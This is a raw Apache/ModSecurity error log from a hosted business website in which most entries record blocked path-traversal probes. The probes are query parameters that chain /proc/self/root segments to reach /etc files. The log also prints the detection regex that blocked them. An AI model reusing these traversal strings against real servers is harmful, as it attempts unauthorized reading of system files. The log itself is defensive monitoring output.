[Thu Mar 19 02:08:16.862904 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.241.31:55706] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuEwNa6ubjKNq_cu4b0UwAAA0U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:08:19.469243 2026] [mime_magic:error] [pid 14269:tid 140411733534464] (70014)End of file found: [client 57.141.18.62:57130] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 02:08:20.136529 2026] [:error] [pid 27403:tid 140411725141760] [client 74.7.241.31:47580] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuExBkFeYa1D6dYQnCl-gAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:08:21.573697 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.228.61:33038] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuExcdf6f5d65gmYZQrhwAAAtg"]
[Thu Mar 19 02:08:32.208371 2026] [mime_magic:error] [pid 17653:tid 140411590858496] (70014)End of file found: [client 57.141.18.78:57498] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 02:08:37.147646 2026] [proxy_fcgi:error] [pid 30077:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:56446] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:08:38.877263 2026] [:error] [pid 30077:tid 140411540502272] [client 74.7.243.128:58002] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuE1vu8EFLIOrSqIptU5gAAAlg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 02:08:48.270439 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.243.128:34066] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuE4OoXxyEfFpUF8f_LqQAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:08:57.321657 2026] [mime_magic:error] [pid 27403:tid 140411649607424] (70014)End of file found: [client 57.141.18.5:58138] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 02:08:59.125801 2026] [proxy_fcgi:error] [pid 30077:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:56876] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:09:15.081223 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.243.128:57982] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuE-wkwaGbbGflqUZBrAQAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:09:25.123420 2026] [proxy_fcgi:error] [pid 26799:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:57378] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:09:51.129840 2026] [proxy_fcgi:error] [pid 30077:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:57910] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:10:18.121858 2026] [proxy_fcgi:error] [pid 17653:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:58384] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:10:29.201996 2026] [core:alert] [pid 19093:tid 140411649607424] [client 74.7.243.128:52082] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/var/cache
[Thu Mar 19 02:10:30.251571 2026] [:error] [pid 14269:tid 140411649607424] [client 74.7.243.128:45402] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuFRgbLMZ6AikZjR9UXEgAAAAs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 02:10:30.253822 2026] [mime_magic:error] [pid 14269:tid 140411649607424] (70014)End of file found: [client 74.7.243.128:45402] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 02:10:46.083433 2026] [proxy_fcgi:error] [pid 15826:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:58996] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:10:51.290395 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.244.43:37282] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuFW_u8EFLIOrSqIptVOQAAAkc"]
[Thu Mar 19 02:11:18.887574 2026] [proxy_fcgi:error] [pid 19093:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:59658] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:11:41.624108 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.243.128:45408] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuFjcdf6f5d65gmYZQsFQAAAtE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:11:46.129803 2026] [proxy_fcgi:error] [pid 14269:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:60230] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:12:12.125967 2026] [proxy_fcgi:error] [pid 27403:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:60768] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:12:36.129775 2026] [proxy_fcgi:error] [pid 19093:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:33062] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:12:49.268659 2026] [mime_magic:error] [pid 17887:tid 140411666392832] (70014)End of file found: [client 57.141.18.114:33978] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 02:12:58.029982 2026] [proxy_fcgi:error] [pid 19093:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:33526] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:13:20.129949 2026] [proxy_fcgi:error] [pid 15826:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:34018] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:13:20.956579 2026] [core:alert] [pid 17653:tid 140411649607424] [client 57.141.18.9:35168] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 02:13:25.492061 2026] [:error] [pid 19093:tid 140411616036608] [client 74.7.228.61:36112] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuF9V_V7PWP6ixUYl52AAAAAo8"]
[Thu Mar 19 02:13:41.125810 2026] [proxy_fcgi:error] [pid 19093:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:34442] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:13:49.866332 2026] [core:alert] [pid 30077:tid 140411649607424] [client 57.141.18.69:35860] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 02:14:03.125790 2026] [proxy_fcgi:error] [pid 17887:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:34884] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:14:21.755968 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.241.31:47594] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuGLcdf6f5d65gmYZQsegAAAsE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:14:27.101959 2026] [proxy_fcgi:error] [pid 27403:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:35364] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:14:50.061806 2026] [proxy_fcgi:error] [pid 30077:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:35806] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:15:15.122786 2026] [proxy_fcgi:error] [pid 27293:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:36266] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:15:31.838807 2026] [:error] [pid 19093:tid 140411699963648] [client 74.7.243.128:52766] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuGc1_V7PWP6ixUYl52TQAAAoU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:15:43.125803 2026] [proxy_fcgi:error] [pid 26799:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:36792] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:15:54.729150 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.244.43:57180] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuGigkwaGbbGflqUZBr7QAAAM4"]
[Thu Mar 19 02:16:11.121771 2026] [proxy_fcgi:error] [pid 15826:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:37356] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:16:30.909015 2026] [mime_magic:error] [pid 14269:tid 140411683178240] (70014)End of file found: [client 57.141.18.5:39364] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 02:16:39.105845 2026] [mime_magic:error] [pid 14269:tid 140411624429312] (70014)End of file found: [client 57.141.18.119:39512] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 02:16:40.077824 2026] [proxy_fcgi:error] [pid 31803:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:37914] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:17:07.121854 2026] [proxy_fcgi:error] [pid 27403:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:38466] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:17:35.129812 2026] [proxy_fcgi:error] [pid 26799:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:39062] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:17:53.597601 2026] [core:alert] [pid 17887:tid 140411708356352] [client 57.141.18.17:41122] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 02:18:02.150923 2026] [proxy_fcgi:error] [pid 19093:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:39772] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:18:23.692242 2026] [core:alert] [pid 27403:tid 140411649607424] [client 57.141.18.45:41808] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 02:18:28.149825 2026] [proxy_fcgi:error] [pid 15826:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:40338] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:18:40.674464 2026] [core:alert] [pid 31803:tid 140411733534464] [client 57.141.18.119:41406] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 02:18:52.129824 2026] [proxy_fcgi:error] [pid 27293:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:40894] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:19:15.121924 2026] [proxy_fcgi:error] [pid 26799:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:41402] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:19:37.085860 2026] [proxy_fcgi:error] [pid 19093:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:41904] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:19:59.129786 2026] [proxy_fcgi:error] [pid 15826:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:42360] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:20:12.005617 2026] [mime_magic:error] [pid 17653:tid 140411741927168] (70014)End of file found: [client 57.141.18.16:44290] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 02:20:15.723769 2026] [mime_magic:error] [pid 15826:tid 140411674785536] (70014)End of file found: [client 57.141.18.87:44450] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 02:20:20.133854 2026] [proxy_fcgi:error] [pid 26799:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:42912] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:20:42.057895 2026] [proxy_fcgi:error] [pid 14269:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:43352] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:21:06.145786 2026] [proxy_fcgi:error] [pid 14269:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:43916] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:21:34.125860 2026] [proxy_fcgi:error] [pid 27293:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:44454] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:21:37.366895 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.241.31:39908] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuH4cdf6f5d65gmYZQtrQAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:21:42.125962 2026] [:error] [pid 27293:tid 140411582465792] [client 74.7.241.31:36772] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuH5v-YZRR_7pZ7nDJI7wAAA9M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:21:43.986167 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.241.31:36774] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuH5-oXxyEfFpUF8f_NJwAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:21:45.567834 2026] [:error] [pid 27293:tid 140411658000128] [client 74.7.241.31:36788] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuH6f-YZRR_7pZ7nDJI8wAAA8o"], referer: 